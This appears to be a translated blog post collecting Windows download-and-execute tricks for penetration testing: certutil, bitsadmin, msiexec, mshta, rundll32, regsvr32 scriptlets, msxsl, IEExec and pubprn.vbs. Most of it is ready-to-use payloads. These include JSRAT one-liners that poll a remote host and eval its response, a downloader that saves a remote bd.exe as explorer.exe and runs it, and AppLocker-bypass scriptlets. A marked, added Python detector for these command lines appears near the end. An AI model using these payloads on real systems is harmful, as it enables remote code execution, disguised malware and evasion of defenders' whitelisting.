    Windows command execution and file download techniques: a summary

    1. Foreword

    Penetration tests and malware analysis constantly turn up all sorts of unusual ways to download files and execute commands; this post collects them in one place.

    2. Techniques

    2.1 PowerShell

    Not supported on Windows Server 2003 and Windows XP.

    $client = new-object System.Net.WebClient
    
    $client.DownloadFile('http://payloads.online/file.tar.gz', 'E:\file.tar.gz')
    

    2.2 FTP

    ftp 192.168.3.2

    After entering the username and password:

    lcd E:\file # set the local directory to E:\file (lcd changes the local side, cd the remote side)

    cd www # change to the www directory on the server

    get access.log # download access.log from the server into E:\file

    See: https://baike.baidu.com/item/ftp/13839

    2.3 IPC$

    copy \\192.168.3.1\c$\test.exe E:\file
    

    2.4 Certutil

    See: https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx

    Applies to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

    certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt
    

    2.5 bitsadmin

    See: https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx

        1. bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt
        2. bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
    

    Complete usage (download, run, delete):

    cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
    

    2.6 msiexec

    msiexec /q /i http://192.168.3.1/test.txt
    

    Using a .png extension:

    msiexec /q /i http://site.com/payloads/calc.png
    

    calc.png is generated with:

    msfvenom -f msi -p windows/exec CMD=calc.exe > calc.png
    

    2.7 IEExec

    Two commands are needed: one turns off the .NET security policy, the other downloads and runs the executable.
    C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
    
    Download the exe:
    C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe
    

    2.8 python

    C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('http://192.168.3.1/test.zip').read();"
    

    2.9 mshta

    mshta http://192.168.3.1/run.hta
    

    run.hta contents:

    <HTML>
    <HEAD>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "cmd.exe /c net user" ' put the command to run here
    self.close
    </script>
    </HEAD>
    <body>
    demo
    </body>
    </HTML>
    

    mshta exists to run .hta files, but testing shows that no .hta file is needed at all: mshta can execute commands directly, and it accepts JavaScript as well as VBScript. The payloads are collected below:

    VBSCRIPT EXEC

    mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
    

    JAVASCRIPT EXEC

    mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
    

    JSRAT

    mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
    

    2.10 rundll32

    This still relies on the WScript.Shell component.

    Default form

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    

    Use SCT

    regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
    

    calc.sct:

    <?XML version="1.0"?>
    <scriptlet>
     
    <registration
        description="Empire"
        progid="Empire"
        version="1.00"
        classid="{20001111-0000-0000-0000-0000FEEDACDC}"
        >
        <!-- regsvr32 /s /i:"C:\Bypass\Backdoor.sct" scrobj.dll -->
        <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
        <!-- That should work over a proxy and SSL/TLS... -->
        <!-- Proof Of Concept - Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
         
                var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
         
            ]]>
    </script>
    </registration>
     
    <public>
        <method name="Exec"></method>
    </public>
    <script language="JScript">
    <![CDATA[
         
        function Exec()
        {
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
        }
         
    ]]>
    </script>
     
    </scriptlet>
    

    Run JSRAT:

    regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
    

    JSRAT.sct

    <?XML version="1.0"?>
    <scriptlet>
    <registration 
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
         
                rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}";
            new ActiveXObject("WScript.Shell").Run(rat,0,true);
         
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    USE PNG

    regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
    

    js.png

    <?XML version="1.0"?>
    <scriptlet>
    <registration 
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
        <![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
        </script>
    </registration>
    </scriptlet>
    

    Use WSC

    Run calc:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")
    

    calc.wsc

    <?xml version="1.0"?>
     
    <package>
    <component id="testCalc">
     
    <script language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    ]]>
    </script>
     
    </component>
    </package>
    
    

    Run JSRAT:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")
    

    JSRAT.wsc:

    <?xml version="1.0"?>
     
    <package>
    <component id="testCalc">
     
    <script language="JScript">
    <![CDATA[
            rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}";
            new ActiveXObject("WScript.Shell").Run(rat,0,true);
    ]]>
    </script>
     
    </component>
    </package>
    

    2.11 regsvr32

    regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
    

    test.data contents:

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                ps  = "cmd.exe /c calc.exe";
                new ActiveXObject("WScript.Shell").Run(ps,0,true);
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    The .sct can also be generated with https://github.com/CroweCybersecurity/ps1encode (COM scriptlet - requires a webserver to stage the payload):

    regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
    

    2.12 MSXSL.EXE

    msxsl.exe is Microsoft's command-line XSL processor; because it evaluates JavaScript embedded in a stylesheet, it can be used to run system commands.

    Download:

    Command Line Transformation Utility (msxsl.exe)

    https://www.microsoft.com/en-us/download/details.aspx?id=21714

    msxsl.exe takes two files, an XML document and an XSL stylesheet:

    msxsl.exe demo.xml exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        xmlns:msxsl="urn:schemas-microsoft-com:xslt"
        xmlns:user="http://mycompany.com/mynamespace">

    <msxsl:script language="JScript" implements-prefix="user">
        function xml(nodelist) {
            var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
            return nodelist.nextNode().xml;
        }
    </msxsl:script>
    <xsl:template match="/">
        <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    msxsl.exe can likewise load both files remotely:

    msxsl https://website.com/scripts/demo.xml https://website.com/scripts/exec.xsl
    

    Generating the MSI with MSF:

    msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi
    

    Run from the command line:

    msiexec /quiet /i cacl.msi
    

    Put the payload on a remote server and run it from there:

    https://website.com/payloads/calc.png
    

    2.13 JS downloader

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                var WSHShell = new ActiveXObject("WScript.Shell");
                path = WSHShell.ExpandEnvironmentStrings("%temp%");
                var filepath = path+"/explorer.exe";
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("GET","http://x.x.x.x/bd.exe", false);
                xhr.send();
                if (xhr.Status == 200) {
                    var fso = new ActiveXObject("Scripting.FileSystemObject");
                    var stream = new ActiveXObject("ADODB.Stream");
                    stream.Open();
                    stream.Type = 1;
                    stream.Write(xhr.ResponseBody);
                    stream.Position = 0;
                    if (fso.FileExists(filepath)){
                       fso.DeleteFile(filepath);
                    }
                    stream.SaveToFile(filepath);
                    stream.Close();
                    new ActiveXObject("WScript.Shell").Exec(filepath);
                }
     
     
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    2.14 pubprn.vbs

    Windows 7 and later ship a Microsoft-signed WSH script named PubPrn.vbs, located in C:\Windows\System32\Printing_Admin_Scripts\en-US. A close look at the script shows that it takes user-supplied input (command-line arguments) and passes it straight to GetObject().

    "C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    test.sct

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        description="Bandit"
        progid="Bandit"
        version="1.00"
        classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
        remotable="true"
    	>
    </registration>
    <script language="JScript">
    <![CDATA[
    		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]>
    </script>
    </scriptlet>
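    As an added, defender-side example that is not part of the original post: a small Python scanner that flags the command-line forms catalogued in sections 2.4 to 2.14 inside constructed, Sysmon-style process-creation events. The rule names and the key=value log layout are assumptions, and the events are made up.

```python
import re

# One rule per technique family from sections 2.4 to 2.14 of the post; each
# pattern matches the command-line form the post shows for that tool.
RULES = [
    ("certutil-urlcache", re.compile(r"certutil(\.exe)?\s.*-urlcache.*\s-f\s+\w+://", re.I)),
    ("bitsadmin-transfer", re.compile(r"bitsadmin(\.exe)?\s.*/transfer\s", re.I)),
    ("msiexec-remote-msi", re.compile(r"msiexec(\.exe)?\s.*/i\s+\w+://", re.I)),
    ("mshta-remote-or-inline", re.compile(r"mshta(\.exe)?\s+(\w+://|vbscript:|javascript:)", re.I)),
    ("rundll32-javascript", re.compile(r"rundll32(\.exe)?\s+javascript:", re.I)),
    ("regsvr32-scrobj-remote", re.compile(r"regsvr32(\.exe)?\s.*/i:\w+://.*scrobj\.dll", re.I)),
    ("pubprn-script-moniker", re.compile(r"pubprn\.vbs.*\sscript:", re.I)),
    ("ieexec-remote", re.compile(r"ieexec(\.exe)?\s+\w+://", re.I)),
    ("msxsl-remote", re.compile(r"msxsl(\.exe)?\s+\w+://", re.I)),
]

def classify(command_line):
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(log_lines):
    """Pull the CommandLine field out of key=value process-creation events
    and return (line_number, [rule names]) for every line that matches."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r"CommandLine=(.*)$", line)
        if m:
            names = classify(m.group(1).strip())
            if names:
                hits.append((n, names))
    return hits

# Constructed sample events (assumption: a Sysmon-like key=value export).
SAMPLE_LOG = [
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
    "EventID=1 Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt",
    "EventID=1 Image=C:\\Windows\\System32\\msiexec.exe CommandLine=msiexec /quiet /i C:\\setup\\app.msi",
    "EventID=1 Image=C:\\Windows\\System32\\mshta.exe CommandLine=mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"calc.exe\",0,true)(window.close)",
    "EventID=1 Image=C:\\Windows\\System32\\regsvr32.exe CommandLine=regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll",
    "EventID=1 Image=C:\\Windows\\System32\\cscript.exe CommandLine=cscript \"C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs\" 127.0.0.1 script:http://192.168.3.1/test.sct",
]

if __name__ == "__main__":
    for n, names in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

    A local .msi install (line 3 of the sample) is deliberately not flagged: the rules key on the remote-URL and inline-script forms the post describes, not on the binaries themselves.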
    

    3. References

    Bypass AppLocker With MSXSL.EXE

    https://evi1cg.me/archives/AppLocker_Bypass_MSXSL.html

    Downloading files from the Windows command line: a summary

    http://payloads.online/archivers/2017-11-08/1

    Bypassing Applocker with msiexec

    https://evi1cg.me/archives/Bypassing_Applocker_with_msiexec.html

    Exec Commands Via Mshta.exe

    https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html

    Several ways to launch JSRAT

    https://evi1cg.me/archives/Run_JSRAT.html

    Can't exploit Windows command execution? Watch me!

    http://www.sohu.com/a/199732200_99907709

    WSH injection tricks

    http://www.freebuf.com/articles/system/143957.html

    Application Whitelist Bypass using IEexec.exe

    https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

    Original article: https://www.cnblogs.com/17bdw/p/8550189.html